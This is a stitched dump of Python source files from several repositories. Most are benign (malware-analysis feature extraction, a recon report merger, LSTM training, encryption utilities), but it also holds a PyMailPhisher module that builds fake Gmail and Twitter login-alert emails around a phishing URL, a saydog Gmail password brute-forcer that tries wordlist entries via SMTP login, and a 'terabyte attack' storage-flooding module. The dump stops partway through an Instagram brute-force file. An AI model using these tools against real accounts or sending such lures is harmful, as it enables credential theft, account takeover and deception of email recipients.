if idaapi.is_call_insn(insn) and idc.get_operand_type(insn.ea, 0) in (idc.o_reg, idc.o_phrase, idc.o_displ):
yield Characteristic("indirect call"), insn.ea
def extract_features(f, bb, insn):
""" extract instruction features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
for inst_handler in INSTRUCTION_HANDLERS:
for (feature, ea) in inst_handler(f, bb, insn):
yield feature, ea
INSTRUCTION_HANDLERS = (
extract_insn_api_features,
extract_insn_number_features,
extract_insn_bytes_features,
extract_insn_string_features,
extract_insn_offset_features,
extract_insn_nzxor_characteristic_features,
extract_insn_mnemonic_features,
extract_insn_peb_access_characteristic_features,
extract_insn_cross_section_cflow,
extract_insn_segment_access_features,
extract_function_calls_from,
extract_function_indirect_call_characteristic_features,
)
def main():
""" """
features = []
for f in capa.features.extractors.ida.helpers.get_functions(skip_thunks=True, skip_libs=True):
for bb in idaapi.FlowChart(f, flags=idaapi.FC_PREDS):
for insn in capa.features.extractors.ida.helpers.get_instructions_in_range(bb.start_ea, bb.end_ea):
features.extend(list(extract_features(f, bb, insn)))
import pprint
pprint.pprint(features)
if __name__ == "__main__":
main()
```
#### File: features/extractors/loops.py
```python
from networkx import nx
from networkx.algorithms.components import strongly_connected_components
def has_loop(edges, threshold=2):
""" check if a list of edges representing a directed graph contains a loop
args:
edges: list of edge sets representing a directed graph i.e. [(1, 2), (2, 1)]
threshold: min number of nodes contained in loop
returns:
bool
"""
g = nx.DiGraph()
g.add_edges_from(edges)
return any(len(comp) >= threshold for comp in strongly_connected_components(g))
``` |
{
"source": "5l1v3r1/GyoiThon",
"score": 2
} |
#### File: 5l1v3r1/GyoiThon/report_merger.py
```python
import os
import sys
import traceback
import re
import codecs
import glob
import configparser
import pandas as pd
from util import Utilty
# Type of printing.
OK = 'ok' # [*]
NOTE = 'note' # [+]
FAIL = 'fail' # [-]
WARNING = 'warn' # [!]
NONE = 'none' # No label.
# Merge report.
class MergeReport:
def __init__(self, utility):
self.utility = utility
# Read config file.
config = configparser.ConfigParser()
self.file_name = os.path.basename(__file__)
self.full_path = os.path.dirname(os.path.abspath(__file__))
config.read(os.path.join(self.full_path, 'config.ini'))
# Define report header.
self.header = ['No', '海外/国内', '会社名/組織名', 'カテゴリ', 'FQDN (URL)', 'リダイレクト/トップURL (URL)',
'ソース (URL)', 'FQDN (IPアドレス)', 'トップURL (IPアドレス)', 'フォーム (認証)', 'Basic (認証)',
'開発/本番 (環境)', 'クラウド (環境)', '製品 (CMS)', '管理画面 (CMS)', '不要なコンテンツ',
'ディレクトリ一覧の表示', 'エラーメッセージ', '不適切なコメント', 'Apache (製品)', 'PHP (製品)',
'OpenSSL (製品)', 'nginx (製品)', 'IIS (製品)', '.NET (製品)',
'MVC (製品)', 'WordPress (製品)', 'その他 (製品)', '備考']
# Must product name.
self.require_prduct = ['apache@http_server', 'php@php', 'openssl@openssl', 'nginx@nginx',
'<EMAIL>', '<EMAIL>', 'microsoft@<EMAIL>',
'wordpress@wordpress']
# Basic authentication regex.
self.basic_regex = 'WWW-Authenticate\:\s(Basic|Bearer|Digest|HOBA|Mutual|AWS4-HMAC-SHA256)\s'
self.basic_proxy_regex = 'Proxy-Authenticate\:\s(Basic|Bearer|Digest|HOBA|Mutual|AWS4-HMAC-SHA256)\s'
try:
self.local_header = (config['Report']['header']).split('@')
self.report_dir = os.path.join(self.full_path, config['Report']['report_path'])
self.in_report = os.path.join(self.report_dir, config['Report']['report_name'])
out_report_name = 'gyoithon_merge_report_{}.csv'.format(self.utility.get_current_date('%Y%m%d%H%M%S'))
self.out_report = os.path.join(self.report_dir, out_report_name)
except Exception as e:
self.utility.print_message(FAIL, 'Reading config.ini is failure : {}'.format(e))
self.utility.write_log(40, 'Reading config.ini is failure : {}'.format(e))
sys.exit(1)
# Create report's header.
def create_report_header(self):
self.utility.print_message(NOTE, 'Create report header : {}'.format(self.out_report))
self.utility.write_log(20, '[In] Create report header [{}].'.format(self.out_report))
# Create report header.
if os.path.exists(self.out_report) is False:
pd.DataFrame([], columns=self.header).to_csv(self.out_report, mode='w', index=False, encoding='Shift_JIS')
self.utility.write_log(20, '[Out] Create report header [{}].'.format(self.out_report))
# Get target report (local report).
def get_target_report(self):
# Gather reporting items.
csv_file_list = glob.glob(self.in_report)
# Create DataFrame.
try:
for report_idx, file in enumerate(csv_file_list):
self.utility.print_message(OK, '{}/{} Processing: {}'.format(report_idx+1, len(csv_file_list), file))
record = []
df_local = pd.read_csv(file, names=self.local_header, header=0, sep=',')
record.append(self.extract_report_element(report_idx+1, df_local))
# Add record.
pd.DataFrame(record).to_csv(self.out_report, mode='a', header=False, index=False, encoding='Shift_JIS')
except Exception as e:
t, v, tb = sys.exc_info()
self.utility.print_message(FAIL, 'Invalid file error: {}'.format(e))
self.utility.print_message(FAIL, traceback.format_exception(t, v, tb))
self.utility.print_message(FAIL, traceback.format_tb(e.__traceback__))
return
# Extract report's element from local reports.
def extract_report_element(self, report_idx, df_local):
record = []
record.insert(0, report_idx) # No.
record.insert(1, '-') # 海外/国内
record.insert(2, '-') # 会社名/組織名
record.insert(3, '-') # カテゴリ
record.insert(4, df_local['fqdn'][0]) # FQDN.
record.insert(5, df_local['origin_url'][0]) # トップURL
record.insert(6, '-') # ソース
record.insert(7, df_local['ip_addr'][0]) # FQDN.
origin_url_ip = (df_local['origin_url'][0]).replace(df_local['fqdn'][0], df_local['ip_addr'][0], 1)
record.insert(8, origin_url_ip) # トップURL.
# Check login form.
if self.check_login_form(df_local):
record.insert(9, '有')
else:
record.insert(9, '-')
# Check Basic authentication.
if self.check_basic_auth(df_local):
record.insert(10, '有')
else:
record.insert(10, '-')
record.insert(11, '-') # 開発/本番
record.insert(12, df_local['cloud_type'][0]) # クラウド
# Check CMS product.
cms_info = list(map(list, set(map(tuple, self.check_cms(df_local)))))
if len(cms_info) != 0:
cms_product = []
cms_manage_page = []
for cms in cms_info:
cms_product.append(cms[0])
cms_manage_page.append(cms[1])
record.insert(13, '\n'.join(cms_product)) # CMS 製品名
record.insert(14, '\n'.join(cms_manage_page)) # 管理画面
else:
record.insert(13, '-')
record.insert(14, '-')
# Check unnecessary contents.
record.insert(15, '\n'.join(self.check_unnecessary_content(df_local)))
record.insert(16, '-') # TODO:ディレクトリ一覧の表示
# Unnecessary comment and error message.
un_comment, error_msg = self.check_comment_error(df_local)
record.insert(17, '\n'.join(error_msg))
record.insert(18, '\n'.join(un_comment))
# Check products.
require_list, other_list = self.check_require_prduct(df_local)
for idx in range(len(require_list)):
if idx == 0: # Apache
self.set_require_prod(idx, 19, require_list, record)
elif idx == 1: # PHP
self.set_require_prod(idx, 20, require_list, record)
elif idx == 2: # OpenSSL
self.set_require_prod(idx, 21, require_list, record)
elif idx == 3: # nginx
self.set_require_prod(idx, 22, require_list, record)
elif idx == 4: # IIS
self.set_require_prod(idx, 23, require_list, record)
elif idx == 5: # .NET
self.set_require_prod(idx, 24, require_list, record)
elif idx == 6: # MVC
self.set_require_prod(idx, 25, require_list, record)
elif idx == 7: # WordPress
self.set_require_prod(idx, 26, require_list, record)
# Other products.
if len(other_list) != 0:
record.insert(27, '\n'.join(other_list))
else:
record.insert(27, '-')
# Note.
record.insert(28, '-')
return record
# Set requirement product.
def set_require_prod(self, prod_idx, rec_idx, require_list, record):
if require_list[prod_idx][0]:
if require_list[prod_idx][1] != '*':
record.insert(rec_idx, '\n'.join(require_list[prod_idx][1]))
else:
record.insert(rec_idx, '○')
else:
record.insert(rec_idx, '-')
# Check login form.
def check_login_form(self, df_local):
df_login = df_local[df_local['origin_login'] != 'Log : - %\nUrl : 0.0 %']
if len(df_login) != 0:
return True
else:
return False
# Check Basic authentication.
def check_basic_auth(self, df_local):
is_basic_auth = False
for log_path in df_local['log']:
with codecs.open(log_path, 'r', encoding='utf-8') as fin:
log_file = fin.read()
obj_match = re.search(self.basic_regex, log_file, flags=re.IGNORECASE)
if obj_match is not None:
is_basic_auth = True
break
obj_match = re.search(self.basic_proxy_regex, log_file, flags=re.IGNORECASE)
if obj_match is not None:
is_basic_auth = True
break
return is_basic_auth
# Check CMS.
def check_cms(self, df_local):
cms_info = []
df_cms = df_local[df_local['prod_type'] == 'CMS']
if len(df_cms) != 0:
for idx, cms_record in df_cms.iterrows():
local_record = []
local_record.insert(0, cms_record['prod_name'] + '/' + cms_record['prod_version'])
if 'Url : 100%' in cms_record['origin_login']:
local_record.insert(1, cms_record['url'])
else:
local_record.insert(1, '-')
cms_info.append(local_record)
return cms_info
# Check unnecessary contents.
def check_unnecessary_content(self, df_local):
un_contents = df_local[(df_local['method'] == 'Direct') | (df_local['method'] == 'Search')]['url']
return list(set(un_contents))
# Check unnecessary comments and error messages.
def check_comment_error(self, df_local):
comments = list(set(df_local['wrong_comment']))
error_msg = list(set(df_local['error_msg']))
return [s for s in comments if s != '-'], [s for s in error_msg if s != '-']
# Check require products.
def check_require_prduct(self, df_local):
# Apache, PHP, OpenSSL, nginx, IIS, ASP.NET, WordPress.
require_list = {0: [False, []], 1: [False, []], 2: [False, []], 3: [False, []],
4: [False, []], 5: [False, []], 6: [False, []], 7: [False, []]}
# Other products.
other_list = []
# Check Requirement products.
for idx, target_product in enumerate(self.require_prduct):
target_item = target_product.split('@')
df_selected_record = df_local[(df_local['vendor_name'] == target_item[0]) &
(df_local['prod_name'] == target_item[1])]
version_list = []
if len(df_selected_record) != 0:
require_list[idx][0] = True
for pd_idx, record in df_selected_record.iterrows():
if record['prod_version'] != '*':
version_list.append('"' + str(record['prod_version']) + '"')
require_list[idx][1].extend(list(set(version_list)))
# Check other products.
df_rec = df_local[~((df_local['vendor_name'] == 'apache') & (df_local['prod_name'] == 'http_server')) &
~((df_local['vendor_name'] == 'php') & (df_local['prod_name'] == 'php')) &
~((df_local['vendor_name'] == 'openssl') & (df_local['prod_name'] == 'openssl')) &
~((df_local['vendor_name'] == 'nginx') & (df_local['prod_name'] == 'nginx')) &
~((df_local['vendor_name'] == 'microsoft') & (df_local['prod_name'] == 'internet_information_server')) &
~((df_local['vendor_name'] == 'microsoft') & (df_local['prod_name'] == 'asp.net')) &
~((df_local['vendor_name'] == 'microsoft') & (df_local['prod_name'] == 'mvc')) &
~((df_local['vendor_name'] == 'wordpress') & (df_local['prod_name'] == 'wordpress'))]
if len(df_rec) != 0:
for other_idx, record in df_rec.iterrows():
if record['prod_name'] != '-':
other_list.append(record['vendor_name'] + ' ' + record['prod_name'] + '/' + record['prod_version'])
return require_list, list(set(other_list))
# main.
if __name__ == '__main__':
merge = MergeReport(Utilty())
# Create report header.
merge.create_report_header()
# Merge report.
merge.get_target_report()
print('finish!!')
``` |
{
"source": "5l1v3r1/linkedin-sales-scraper",
"score": 3
} |
#### File: 5l1v3r1/linkedin-sales-scraper/main.py
```python
from LinkedinScraper import LinkedinScraper
def main():
username = "My LinkedIn Username"
password = "<PASSWORD>"
company = "Desired Company"
to_ignore = []
scraper = LinkedinScraper(
username=username,
password=password,
company_name=company,
count=100,
to_ignore=to_ignore,
guess_email=True,
headless=False,
link_scrape=True,
user_agent=False,
)
scraper.run()
if __name__ == "__main__":
main()
``` |
{
"source": "5l1v3r1/LSTM_ROM_Arxiv",
"score": 2
} |
#### File: BiLSTM/PODm3/trainBiLSTMROMiso.py
```python
import h5py
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.layers import TimeDistributed
from keras.layers import Bidirectional
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
from keras import optimizers
from keras.models import load_model
f = h5py.File('PODm3_isotropicTurb32BoxALL.mat')
data = f.get('data')
data = np.transpose(data)
# Set User-defined params
n_cells=250
lr=0.005
batch_size = 32
epochs = 75
modelfilename = 'isoturb32boxROM_PODm3_c2.1.h5'
lossfilename = 'isoturb32boxROM_PODm3_c2.1_res'
length = 10
output = 10
def create_sequences(data, length, output):
nsignals = data.shape[1]
siglen = data.shape[0]
sampX=[]
sampy=[]
indx = siglen - output - length
for j in range(nsignals):
sig = data[:,j]
for i in range(indx):
tempX = sig[i:length+i]
tempy = sig[i+length:length+i+output]
sampX.append(tempX)
sampy.append(tempy)
nsamples = len(sampX)
X = np.array(sampX).reshape(nsamples, length, 1)
y = np.array(sampy).reshape(nsamples, output, 1)
return X, y
#Split training and test datasets
def define_test_dataset(X, y, n_patterns, ntestsigs):
testindex = int(np.floor(ntestsigs*n_patterns))
X_train = X[:-testindex,:,:]
y_train = y[:-testindex,:]
X_test = X[-testindex:,:,:]
y_test = y[-testindex:,:]
X_train = np.array(X_train)
y_train = np.array(y_train)
X_test = np.array(X_test)
y_test = np.array(y_test)
return X_train, y_train, X_test, y_test
# configure problem
nsignals = data.shape[1]
siglen = data.shape[0]
# Extract sequences
inputdata = data[:,0:6]
X, y = create_sequences(inputdata, length, output)
#np.random.shuffle(X)
#np.random.shuffle(y)
ntestpatterns = siglen - length - output
ntestsigs = 1
X_train, y_train, X_test, y_test = define_test_dataset(X, y, ntestpatterns, ntestsigs)
X_train.shape
# define model
model = Sequential()
model.add(Bidirectional(LSTM(n_cells, return_sequences=True), input_shape=(length, 1)))
model.add(TimeDistributed(Dense(1)))
adam = optimizers.Adam(lr=lr, beta_1=0.9, beta_2=0.999, epsilon=1e-8)
model.compile(loss='mae', optimizer='adam')
print(model.summary())
# fit model
history = model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs)
print('Saving weights..')
#save weights for analysis
model.save(modelfilename)
loss_history =history.history['loss']
# Save results to file
print('Saving results')
np.savez_compressed(lossfilename, batch_size=batch_size, epochs=epochs, loss_history=loss_history)
``` |
{
"source": "5l1v3r1/PyMailPhisher",
"score": 3
} |
#### File: lib/parsers/gmail.py
```python
import os
import json
from lib.colors import style
# Generate a gmail email template
def gmail():
print (u"{}[2J{}[;H".format(chr(27), chr(27))) # Clear the terminal
print(style.YELLOW('--Fill the folowing credentials for Google Gmail phishing email--'))
name = str(input(style.GREEN('[+]') + style.RESET(' Displayed name: ')))
email = str(input(style.GREEN('[+]') + style.RESET(' Displayed email: ')))
url = str(input(style.GREEN('[+]') + style.RESET(' Phishing URL: ')))
device = str(input(style.GREEN('[+]') + style.RESET(' Login device [Eg: Windows, Iphone...]: ')))
browser = str(input(style.GREEN('[+]') + style.RESET(' Login browser [Eg: FireFox, Safari...]: ')))
city = str(input(style.GREEN('[+]') + style.RESET(' Login city: ')))
country = str(input(style.GREEN('[+]') + style.RESET(' Login country: ')))
day = str(input(style.GREEN('[+]') + style.RESET(' Login day [In numbers]: ')))
day_name = str(input(style.GREEN('[+]') + style.RESET(' Login day of the week: ')))
year = str(input(style.GREEN('[+]') + style.RESET(' Login year: ')))
time = str(input(style.GREEN('[+]') + style.RESET(' Login time [HH:MMpm/am]: ')))
timezone = str(input(style.GREEN('[+]') + style.RESET(' Login timezone [Eg: GMT, ETC...]: ')))
month = str(input(style.GREEN('[+]') + style.RESET(' Login month [eg: June]: ')))
if not url.startswith('http://') or not url.startswith('http://'):
url = f"http://{url}"
else:
None
with open('Templates/Gmail.html', 'r') as read_file, \
open('Templates/Generated_Emails/GmailTemplate.html', 'w') as write_file:
for line in read_file:
write_file.write(line.replace('#NAME', name).replace('#EMAIL', email).replace('#URL', url).replace('#MONTH', month)
.replace('#DEVICE', device).replace('#BROWSER', browser).replace('#CITY', city).replace('#COUNTRY', country)
.replace('#DAY', day).replace('#YEAR', year).replace('#TIME', time).replace('#ZONE', timezone).replace('#ND', day_name))
```
#### File: lib/parsers/twitter.py
```python
import os
import json
from lib.colors import style
# Generate an twitter email template
def twitter():
print (u"{}[2J{}[;H".format(chr(27), chr(27))) # Clear the terminal
print(style.YELLOW('--Fill the folowing credentials for Twitter phishing email--'))
username = str(input(style.GREEN('[+]') + style.RESET(' Displayed username: ')))
url = str(input(style.GREEN('[+]') + style.RESET(' Phishing URL: ')))
city = str(input(style.GREEN('[+]') + style.RESET(' Login city: ')))
country = str(input(style.GREEN('[+]') + style.RESET(' Login country: ')))
browser = str(input(style.GREEN('[+]') + style.RESET(' Login browser [Eg: FireFox, Safari...]: ')))
device = str(input(style.GREEN('[+]') + style.RESET(' Login device [Eg: Windows, Iphone...]: ')))
if not url.startswith('http://') or not url.startswith('http://'):
url = f"http://{url}"
else:
None
with open('Templates/Twitter.html', 'r') as read_file, \
open('Templates/Generated_Emails/TwitterTemplate.html', 'w') as write_file:
for line in read_file:
write_file.write(line.replace('#USERNAME', username).replace('#CITY', city).replace('#URL', url)
.replace('#COUNTRY' , country).replace('#DEVICE',device ).replace('#BROWSER', browser))
``` |
{
"source": "5l1v3r1/qiskit-ibmq-provider",
"score": 2
} |
#### File: api/rest/validation.py
```python
from marshmallow import pre_load
from marshmallow.validate import OneOf
from qiskit.providers.ibmq.apiconstants import ApiJobStatus
from qiskit.validation import BaseSchema
from qiskit.validation.fields import String, Nested, Integer, DateTime, Float
from qiskit.providers.ibmq.utils.fields import map_field_names
# Helper schemas.
class InfoQueueResponseSchema(BaseSchema):
"""Queue information schema, nested in StatusResponseSchema"""
# Optional properties
position = Integer(required=False, missing=None)
_status = String(required=False, missing=None)
estimated_start_time = DateTime(required=False, missing=None)
estimated_complete_time = DateTime(required=False, missing=None)
hub_priority = Float(required=False, missing=None)
group_priority = Float(required=False, missing=None)
project_priority = Float(required=False, missing=None)
@pre_load
def preprocess_field_names(self, data, **_): # type: ignore
"""Pre-process the info queue response fields."""
FIELDS_MAP = { # pylint: disable=invalid-name
'status': '_status',
'estimatedStartTime': 'estimated_start_time',
'estimatedCompleteTime': 'estimated_complete_time',
'hubPriority': 'hub_priority',
'groupPriority': 'group_priority',
'projectPriority': 'project_priority'
}
return map_field_names(FIELDS_MAP, data)
# Endpoint schemas.
class StatusResponseSchema(BaseSchema):
"""Schema for StatusResponse"""
# Optional properties
infoQueue = Nested(InfoQueueResponseSchema, required=False)
# Required properties
status = String(required=True, validate=OneOf([status.value for status in ApiJobStatus]))
class BackendJobLimitResponseSchema(BaseSchema):
"""Schema for BackendJobLimit"""
# Optional properties
maximum_jobs = Integer(required=True)
running_jobs = Integer(required=True)
@pre_load
def preprocess_field_names(self, data, **_): # type: ignore
"""Pre-process the jobs limit response fields."""
FIELDS_MAP = { # pylint: disable=invalid-name
'maximumJobs': 'maximum_jobs',
'runningJobs': 'running_jobs'
}
return map_field_names(FIELDS_MAP, data)
``` |
{
"source": "5l1v3r1/SafeCrypta",
"score": 3
} |
#### File: 5l1v3r1/SafeCrypta/SafeCrypta.py
```python
import os
import time
import random
import hashlib
import getpass
import requests
import pyautogui
import pyAesCrypt
from pyautogui import position
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()'
def encryption():
print('Which key generation technique would you like to use (Use 1, 2 or 3)')
tech = input(
'[1] Random Seed/[2] Use existing seed/[3] Random KeyFile>>> ')
if tech == '1':
print('[*] Please wait while we get the environment...')
tech = None
res = requests.get(
'http://svnweb.freebsd.org/csrg/share/dict/words?view=co&content-type=text/plain')
words = ''
for i in range(random.randint(10, 15)):
words += random.choice(res.content.splitlines()
).lower().decode("utf-8") + ' '
print('Printing your seed for 15 seconds, then it will be destroyed')
print(words)
seed = words
words = None
time.sleep(15)
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print('[*] Cleared Environment')
seeds = getpass.getpass('Please input the seed>>> ')
seeds = seeds.replace(" ", "")
if seeds != seed.replace(" ", ""):
print('You have incorrectly entered the seed!')
exit()
else:
print('Congrats, the seed you entered was correct')
seed = None
seedHash = hashlib.sha3_512(str.encode(seeds)).digest()
seeds = None
filename = input('Enter the name of the file>> ')
pyAesCrypt.encryptFile(
filename, filename + '.safec', str(seedHash), 64 * 1024)
print(
f'[*] Succesfully encrypted {filename} into archive {filename}.safec')
if tech == '2':
print('[*] Please wait while we get the environment...')
tech = None
seed = getpass.getpass('Please input your seed>>> ')
seedHash = str(hashlib.sha3_512(str.encode(seed)).digest())
seed = None
filename = input('Enter the name of the file>> ')
pyAesCrypt.encryptFile(filename, filename +
'.safec', seedHash, 64 * 1024)
os.remove(filename)
print(
f'[*] Succesfully encrypted {filename} into archive {filename}.safec')
seedHash = None
if tech == '3':
print('[*] Please wait while we get the environment...')
tech = None
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print('[*] Please move your mouse around your screen')
# Ensure the user is moving their mouse around the screen
time.sleep(2)
random.seed(pyautogui.position()[0] + 7j * pyautogui.position()[1])
randomKeys = []
for i in range(random.randint(5, random.randint(10, 30))):
time.sleep(random.random())
seed = pyautogui.position()[0] + 9j * pyautogui.position()[1]
random.seed(seed)
if random.random() >= random.random():
integer = str(random.random()).split('.')
randomKeys.append(''.join(random.choice(chars) for i in range(
random.randint(0, 50))) + integer[1] + random.choice(chars) + integer[0])
else:
integer = str(random.random()).split('.')[1]
randomKeys.append(integer + random.choice(chars) * 5 + ''.join(
random.choice(chars) for i in range(random.randint(0, 50))))
random.seed(pyautogui.position()[
0] + 6j * int(str(int(str(time.time()).split('.')[1]) / 100).split('.')[0]))
random.shuffle(randomKeys)
random.seed(pyautogui.position()[
1] + 4j * int(str(int(str(time.time()).split('.')[1]) / 100).split('.')[0]))
random.shuffle(randomKeys)
random.seed(pyautogui.position()[0] + 1j * pyautogui.position()[1])
trueKey = random.choice(randomKeys)
print('[*] The random key has been generated, exporting to Key.safek')
with open('Key.safek', 'w') as f:
f.write(str(trueKey))
trueKey = str(hashlib.sha3_512(str.encode(trueKey)).digest())
print('[*] The random key has been exported')
filename = input('Enter the name of the file>> ')
pyAesCrypt.encryptFile(filename, filename +
'.safec', trueKey, 64 * 1024)
trueKey = None
os.remove(filename)
print(
f'[*] Succesfully encrypted {filename} into archive {filename}.safec')
def decryption():
print('Which method would you like to use for decryption (Use 1 or 2)')
tech = input('[1] Use a seed or passphrase/[2] Use a KeyFile>>> ')
if tech == '1':
tech = None
seeds = getpass.getpass('Please input the seed/passphrase>>> ')
seeds = seeds.replace(" ", "")
seeds = str(hashlib.sha3_512(str.encode(seeds)).digest())
filename = input('Enter the name of the file>> ')
try:
pyAesCrypt.decryptFile(filename, filename.split(
'.')[0] + '.' + filename.split('.')[1], seeds, 64 * 1024)
except Exception as e:
print(e)
exit()
print('[*] Cleaning environment...')
seeds = None
os.remove(filename)
exportedFile = filename.split(".")[0] + "." + filename.split(".")[1]
print(
f'[*] Succesfully decrypted {filename} into raw file {exportedFile}')
if tech == '2':
tech = None
keyFile = input('Enter the name of the KeyFile>> ')
filename = input('Enter the name of the file>> ')
with open(keyFile, 'r') as key:
keys = str(hashlib.sha3_512(
str.encode(key.read().strip())).digest())
try:
pyAesCrypt.decryptFile(filename, filename.split(
'.')[0] + '.' + filename.split('.')[1], keys, 64 * 1024)
except Exception as e:
print(e)
exit()
keys = None
exportedFile = filename.split(".")[0] + "." + filename.split(".")[1]
os.remove(filename)
print(
f'[*] Succesfully decrypted {filename} into raw file {exportedFile}')
def generation():
tech = input('[1] Generate random seed//[2] Generate random KeyFile>> ')
if tech == '1':
print('[*] Please wait while we get the environment...')
tech = None
res = requests.get(
'http://svnweb.freebsd.org/csrg/share/dict/words?view=co&content-type=text/plain')
words = ''
for i in range(random.randint(10, 15)):
words += random.choice(res.content.splitlines()
).lower().decode("utf-8") + ' '
print('Printing your seed for 15 seconds, then it will be destroyed')
print(words)
time.sleep(15)
words = None
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
exit()
if tech == '2':
print('[*] Please wait while we get the environment...')
tech = None
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print('[*] Please move your mouse around your screen')
# Ensure the user is moving their mouse around the screen
time.sleep(2)
random.seed(pyautogui.position()[0] + 7j * pyautogui.position()[1])
randomKeys = []
for i in range(random.randint(5, random.randint(10, 30))):
time.sleep(random.random())
seed = pyautogui.position()[0] + 9j * pyautogui.position()[1]
random.seed(seed)
if random.random() >= random.random():
integer = str(random.random()).split('.')
randomKeys.append(''.join(random.choice(chars) for i in range(
random.randint(0, 50))) + integer[1] + random.choice(chars) + integer[0])
else:
integer = str(random.random()).split('.')[1]
randomKeys.append(integer + random.choice(chars) * 5 + ''.join(
random.choice(chars) for i in range(random.randint(0, 50))))
random.seed(pyautogui.position()[
0] + 6j * int(str(int(str(time.time()).split('.')[1]) / 100).split('.')[0]))
random.shuffle(randomKeys)
random.seed(pyautogui.position()[
1] + 4j * int(str(int(str(time.time()).split('.')[1]) / 100).split('.')[0]))
random.shuffle(randomKeys)
random.seed(pyautogui.position()[0] + 1j * pyautogui.position()[1])
trueKey = random.choice(randomKeys)
exportWhere = input('Filename to export to>> ')
print(
f'[*] The random key has been generated, exporting to {exportWhere}')
with open(exportWhere, 'w') as f:
f.write(str(trueKey))
trueKey = str(hashlib.sha3_512(str.encode(trueKey)).digest())
print('[*] The random key has been exported')
def main():
print('Welcome to SafeCrypta | v1.0 File Encryption')
print('''
What would you like to do:
1.) Encrypt a file
2.) Decrypt a file
3.) Generate a random key''')
userInput = input('Option> ')
if str(userInput):
if userInput.lower().startswith('e'):
print('[*] Switching to encryption environment, please wait')
encryption()
elif userInput.lower().startswith('d'):
print('[*] Switching to decryption environment, please wait')
decryption()
elif userInput.lower().startswith('r') or userInput.lower().startswith('g'):
print('[*] Switching to generating environment, please wait')
generation()
elif userInput == '1':
print('[*] Switching to encryption environment, please wait')
encryption()
elif userInput == '2':
print('[*] Switching to decryption environment, please wait')
decryption()
elif userInput == '3':
print('[*] Switching to generating environment, please wait')
generation()
else:
print('[!] Exitting...')
exit()
else:
print('[!] Exitting...')
exit()
main()
``` |
{
"source": "5l1v3r1/saydog-framework",
"score": 3
} |
#### File: exploit/pytoolkit/terabyte.py
```python
import os, sys
import socket
import time
u='\033[4m'
w='\x1b[00m'
r='\x1b[91m'
b='\x1b[36;1m'
y='\x1b[33m'
def infouser():
s =socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8',80))
ipaddress=(s.getsockname()[(0)])
sprint('Your ip address: '+ipaddress)
s.close
def exit():
print(r+'[!]'+w+' The user forces it to stop')
print(r+'[!]'+w+' Exiting program')
sys.exit(1)
def corrupt():
print(r+'[?]'+w+' Command not found, please type help')
def help():
print('')
print('TERABYTE ATTACK')
print('----------------')
print('Terabyte attack is auto copying files')
print('and sending the files in size 10MB to 1TB')
print('')
print('command example')
print('------- -------')
print('set name [name files] set name faketool')
print('set output set output /sdcard')
print('run, go, create create')
print('')
def main():
global name
global output
while True:
try:
tyb = input(w+'saydog('+r+'pytoolkit/terabyte'+w+') > ')
if tyb == 'help':
help()
elif tyb == 'clear':
os.system('clear')
elif tyb == 'back':
sys.exit(0)
elif tyb == 'exit':
exit()
elif 'set name' in tyb:
name = tyb.split()[(-1)]
print('name > '+name)
elif 'set output' in tyb:
output = tyb.split()[(-1)]
print('output > '+output)
elif tyb == 'run' or tyb == 'go' or tyb == 'create' or tyb == 'exploit':
print(b+'[-]'+w+' Writting code for terabyte attack')
time.sleep(2)
print(b+'[-]'+w+' set looping in 100000')
time.sleep(3)
os.system('cat tera > '+output+'/terabyte.py')
print(b+'[+]'+w+' success, file saved as'+output)
else:
corrupt()
except KeyboardInterrupt:
exit()
main()
```
#### File: exploit/socialbrute/gmailbrute.py
```python
import smtplib
import os,sys
import time
u='\033[4m'
w='\x1b[00m'
r='\x1b[91m'
c='\x1b[36;1m'
y ='\x1b[33m'
def exit():
print(r+'[!]'+w+' The user forces it to stop')
print(r+'[!]'+w+' Exiting program')
sys.exit(1)
def corrupt():
print(r+'[?]'+w+' Command not found, please type help')
def help():
print('')
print('BRUTEFORCE GMAIL')
print('---------------')
print('Bruteforce attack gmail')
print('command example')
print('------- -------')
print('set username [target] set username <EMAIL>')
print('set wordlist [path/name] set wordlist pass.txt')
print('show, show value show value')
print('run, go, exploit exploit')
print('')
user = ''
file = ''
def server():
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
def main():
global user
global file
while True:
usr = input(w+'saydog('+r+'socialbrute/gmail'+w+') > ')
if usr == 'help':
help()
elif usr == 'clear':
os.system('clear')
elif usr == 'back':
sys.exit(0)
elif usr == 'exit':
exit()
elif 'set username' in usr:
user = usr.split()[(-1)]
print('username > '+user)
elif 'set wordlist' in usr:
file = usr.split()[(-1)]
print('wordlist > '+file)
elif usr == 'show' or usr == 'show value':
print('')
print('-------------------------')
print('username : '+user)
print('wordlist : '+file)
print('-------------------------')
print('')
elif usr == 'run' or usr == 'go' or usr =='exploit':
print(y+'[-]'+w+' Starting bruteforce attack to '+user)
print(y+'[-]'+w+' List of words found on '+file)
print('')
time.sleep(3)
print(y+'[-]'+w+' Preparing for attack ...')
time.sleep(2)
print(c+'[!]'+w+' Bruteforce is running')
print('')
file = open(file,'r')
for password in file:
try:
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.login(user, password)
print(c+'[+]'+w+' Successful exploiting')
print(c+'[+]'+w+' Password found: %s' % password)
time.sleep(1)
except smtplib.SMTPAuthenticationError:
print(y+'[-]'+w+' Password incorrect: %s' % password.strip())
except FileNotFoundError:
print(r+'[!] Error:'+w+' [username] or [wordlist] not found')
except KeyboardInterrupt:
exit()
else:
corrupt()
main()
```
#### File: exploit/socialbrute/instabrute.py
```python
import os,sys
from time import *
from __main__ import *
w='\x1b[00m'
u='\033[4m'
b='\x1b[36;1m'
r='\x1b[91m'
user = ' '
worldlist = ' '
def sprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(0.1 / 100)
def corrupt():
print(r+'[?]'+w+' Command not found, please type help')
def exit():
